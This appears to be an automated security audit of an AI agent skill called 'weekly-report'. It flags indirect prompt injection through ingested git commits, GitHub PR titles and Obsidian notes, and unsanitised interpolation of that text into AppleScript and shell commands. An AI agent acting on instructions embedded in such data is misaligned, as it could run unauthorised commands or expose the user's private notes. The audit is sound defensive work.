weekly-report
Warn
Audited by Gen Agent Trust Hub on Mar 25, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [PROMPT_INJECTION]: Indirect prompt injection vulnerability surface detected. The skill ingests data from external sources to influence its behavior during report generation and automated scheduling. \n
- Ingestion points: Local git repositories (
~/code/), GitHub PR/Issue titles via theghCLI, and personal Obsidian daily notes. \n - Boundary markers: Absent. The skill does not implement delimiters or instructions to ignore potential commands embedded within retrieved work logs or commit messages. \n
- Capability inventory: Execution of shell commands (
git,reminders-cli), AppleScript (osascript), and network requests (gh). \n - Sanitization: Absent. Content from external sources is interpolated directly into script templates without validation or escaping. \n- [COMMAND_EXECUTION]: The skill performs dynamic script generation and execution using data derived from external sources. \n
- Evidence: In Step 6, project names and task descriptions are extracted from the draft and interpolated into AppleScript code for
osascriptand shell commands forreminders-clito create events and tasks. \n - Potential for injection: Maliciously crafted data in a git commit or GitHub PR (e.g., using quotes or control characters) could break the script syntax to execute unauthorized actions on the user's system. \n- [DATA_EXFILTRATION]: The skill requires broad access to the user's local and remote work history. \n
- Evidence: The skill reads local monorepo workspaces, git logs, and the user's private Obsidian vault (
~/Library/Mobile Documents/iCloud~md~obsidian/). \n - Context: While this access is central to the skill's purpose, the inclusion of personal documentation and repository history in the agent's context increases the impact of any prompt injection or compromise.
Audit Metadata